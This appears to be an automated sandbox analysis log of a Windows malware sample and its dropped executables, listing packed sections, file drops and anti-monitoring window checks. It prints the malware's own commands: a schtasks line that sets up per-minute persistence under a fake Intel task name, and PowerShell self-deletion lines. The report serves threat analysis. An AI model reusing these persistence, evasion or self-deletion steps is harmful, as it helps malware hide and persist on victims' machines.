                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: file.exeStatic file information: File size 3003904 > 1048576
                          Source: file.exeStatic PE information: Raw size of rlgtiwao is bigger than: 0x100000 < 0x2aba00
                          Source: Binary string: wkernel32.pdb source: 80f68847d3.exe, 00000023.00000003.2357823497.00000000056C0000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2357638575.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362789768.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362892091.0000000004F10000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernelbase.pdb source: 80f68847d3.exe, 00000023.00000003.2358425905.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2358664230.00000000057C0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2363157225.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2363376254.0000000005010000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ntdll.pdb source: 80f68847d3.exe, 00000023.00000003.2352330362.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2352832260.0000000005790000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2361729764.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362006479.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdbUGP source: 80f68847d3.exe, 00000023.00000003.2356903461.0000000005740000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2356532106.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362545931.0000000004F90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362355341.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: ntdll.pdbUGP source: 80f68847d3.exe, 00000023.00000003.2352330362.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2352832260.0000000005790000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2361729764.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362006479.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdb source: 80f68847d3.exe, 00000023.00000003.2356903461.0000000005740000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2356532106.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362545931.0000000004F90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362355341.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernel32.pdbUGP source: 80f68847d3.exe, 00000023.00000003.2357823497.00000000056C0000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2357638575.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362789768.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2362892091.0000000004F10000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: wkernelbase.pdbUGP source: 80f68847d3.exe, 00000023.00000003.2358425905.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, 80f68847d3.exe, 00000023.00000003.2358664230.00000000057C0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2363157225.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000003.2363376254.0000000005010000.00000004.00000001.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.890000.0.unpack :EW;.rsrc:W;.idata :W;rlgtiwao:EW;yjhidprh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rlgtiwao:EW;yjhidprh:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.600000.0.unpack :EW;.rsrc:W;.idata :W;rlgtiwao:EW;yjhidprh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rlgtiwao:EW;yjhidprh:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.600000.0.unpack :EW;.rsrc:W;.idata :W;rlgtiwao:EW;yjhidprh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rlgtiwao:EW;yjhidprh:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeUnpacked PE file: 35.2.80f68847d3.exe.880000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kucwzsnp:EW;vgfkproo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kucwzsnp:EW;vgfkproo:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: random[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                          Source: d2cb36d600.exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                          Source: Intel_PTT_EK_Recertification.exe.25.drStatic PE information: real checksum: 0x0 should be: 0x1c320c
                          Source: random[1].exe1.6.drStatic PE information: real checksum: 0x1ecda5 should be: 0x1f42f6
                          Source: 80f68847d3.exe.6.drStatic PE information: real checksum: 0x1ecda5 should be: 0x1f42f6
                          Source: 7z.exe.12.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                          Source: 9f237e29d5.exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc2aa1
                          Source: file.exeStatic PE information: real checksum: 0x2ebe6a should be: 0x2e529c
                          Source: 7z.dll.12.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                          Source: skotes.exe.0.drStatic PE information: real checksum: 0x2ebe6a should be: 0x2e529c
                          Source: in.exe.23.drStatic PE information: real checksum: 0x0 should be: 0x1c320c
                          Source: random[2].exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc2aa1
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name: rlgtiwao
                          Source: file.exeStatic PE information: section name: yjhidprh
                          Source: file.exeStatic PE information: section name: .taggant
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name: rlgtiwao
                          Source: skotes.exe.0.drStatic PE information: section name: yjhidprh
                          Source: skotes.exe.0.drStatic PE information: section name: .taggant
                          Source: random[1].exe1.6.drStatic PE information: section name:
                          Source: random[1].exe1.6.drStatic PE information: section name: .idata
                          Source: random[1].exe1.6.drStatic PE information: section name:
                          Source: random[1].exe1.6.drStatic PE information: section name: kucwzsnp
                          Source: random[1].exe1.6.drStatic PE information: section name: vgfkproo
                          Source: random[1].exe1.6.drStatic PE information: section name: .taggant
                          Source: 80f68847d3.exe.6.drStatic PE information: section name:
                          Source: 80f68847d3.exe.6.drStatic PE information: section name: .idata
                          Source: 80f68847d3.exe.6.drStatic PE information: section name:
                          Source: 80f68847d3.exe.6.drStatic PE information: section name: kucwzsnp
                          Source: 80f68847d3.exe.6.drStatic PE information: section name: vgfkproo
                          Source: 80f68847d3.exe.6.drStatic PE information: section name: .taggant
                          Source: in.exe.23.drStatic PE information: section name: UPX2
                          Source: Intel_PTT_EK_Recertification.exe.25.drStatic PE information: section name: UPX2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008AD91C push ecx; ret 0_2_008AD92F
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A1359 push es; ret 0_2_008A135A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_0061D91C push ecx; ret 2_2_0061D92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0061D91C push ecx; ret 6_2_0061D92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0061DFC6 push ecx; ret 6_2_0061DFD9
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 8_2_0092534A push ecx; ret 8_2_0092535D
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 10_2_0092534A push ecx; ret 10_2_0092535D
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013CCF56 push esp; iretd 11_3_013CCF59
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013CCF56 push esp; iretd 11_3_013CCF59
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013AC00A push edi; ret 11_3_013AC039
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013AC00A push edi; ret 11_3_013AC039
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013ADF62 push edx; ret 11_3_013AE001
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013ADF62 push edx; ret 11_3_013AE001
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013C1355 push esp; iretd 11_3_013C153C
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013ADE82 push ecx; retf 11_3_013ADE88
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013ADE62 push ecx; retf 11_3_013ADE88
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013ADFCA push edx; ret 11_3_013AE001
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013ADFCA push edx; ret 11_3_013AE001
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013BA458 push 78013BC3h; ret 11_3_013BA45D
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013CCF56 push esp; iretd 11_3_013CCF59
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_013CCF56 push esp; iretd 11_3_013CCF59
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01362522 push dword ptr [edi]; retf 11_3_01362527
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01362522 push dword ptr [edi]; retf 11_3_01362527
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_0134EE38 push es; retn 000Bh11_3_0134EE3A
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_0134EE38 push es; retn 000Bh11_3_0134EE3A
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01350F0E pushad ; iretd 11_3_01350F25
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01350F0E pushad ; iretd 11_3_01350F25
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01351A59 push ebp; ret 11_3_01351A91
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_01351A59 push ebp; ret 11_3_01351A91
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_0134EE38 push es; retn 000Bh11_3_0134EE3A
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeCode function: 11_3_0134EE38 push es; retn 000Bh11_3_0134EE3A
                          Source: file.exeStatic PE information: section name: entropy: 7.981358643566328
                          Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.981358643566328
                          Source: random[1].exe1.6.drStatic PE information: section name: entropy: 7.981750871713057
                          Source: random[1].exe1.6.drStatic PE information: section name: kucwzsnp entropy: 7.953254117133547
                          Source: 80f68847d3.exe.6.drStatic PE information: section name: entropy: 7.981750871713057
                          Source: 80f68847d3.exe.6.drStatic PE information: section name: kucwzsnp entropy: 7.953254117133547
                          Source: initial sampleStatic PE information: section name: UPX0
                          Source: initial sampleStatic PE information: section name: UPX1
                          Source: initial sampleStatic PE information: section name: UPX0
                          Source: initial sampleStatic PE information: section name: UPX1

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                          Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file

                          Boot Survival

                          barindex
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
